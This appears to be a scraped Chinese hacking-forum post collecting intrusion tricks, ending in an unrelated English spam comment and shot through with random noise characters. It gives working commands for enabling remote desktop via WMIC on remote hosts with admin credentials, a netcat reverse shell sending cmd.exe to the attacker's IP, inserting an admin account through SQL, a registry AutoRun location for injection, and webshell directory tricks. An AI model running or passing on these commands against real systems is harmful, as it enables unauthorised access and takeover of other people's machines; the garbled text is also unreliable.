, o6 @9 P0 b1 a! W3 ]. T6 ](2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor + a) E W& f4 ?9 G1 H5 qAutoRun 8 g+ C8 o/ L5 X9 ~3 P5 h 0 T0 E) P( f& x- x# E& u ; O, |: I- Y; c+ `在找注入时搜索Hidden,把他改成test $ `. k0 y' T3 k7 I* C* F* U0 P # ^5 B2 _' I& K3 ~* }& g- |* g* L3 G6 S, F
9 O/ S0 Y; ]9 _2 _" g0 rmstsc /v:IP /console 7 J6 e: g/ X: r- Z Y ) ?' M( s: a. v' i5 Q8 d3 H5 ?) i4 O1 G5 f+ u' ^
一句话开3389: 1 B2 T3 N# N& Y3 J& a& F 1 _5 E# q$ {6 U3 m Y4 I5 M. b最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> - J) G* @. V$ t
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.3 ~9 n& f: o, K+ x
; j1 x% \4 L: e: R# {
. \0 a6 i" I6 j7 p H% b
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下: $ s$ \- L- R7 @- Q! W1 ~Insert into admin(user,pwd) values('test','test')$ g) P) G" _* f! Y7 o" i) j$ ^
& k* Q$ ?1 @" Y
- x% h/ E, B8 K: S
NC反弹9 m: M1 G' j4 D
先在本机执行: nc -vv -lp 监听的端口 (自己执行) 4 g. F% ]4 U2 M) j- X0 b3 j+ z+ z
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)$ T& @$ w, [9 c; S& M- `
# I+ g8 l, ]2 Q! }+ ^
& K7 g4 X" r1 e, ]在脚本入侵过程中要经常常试用%00来确认下参数是否有问题 g: K& h- i" ?9 I6 a0 G1 N' e, h- _! W( X# l0 D
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录 # m' l+ `, Z4 W1 P, y3 ]( r例如:$ N" m/ L) R. ~- X! f) K# U* n! _+ _
subst k: d:\www\ 用d盘www目录替代k盘( H/ E1 o! A& d, H
subst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta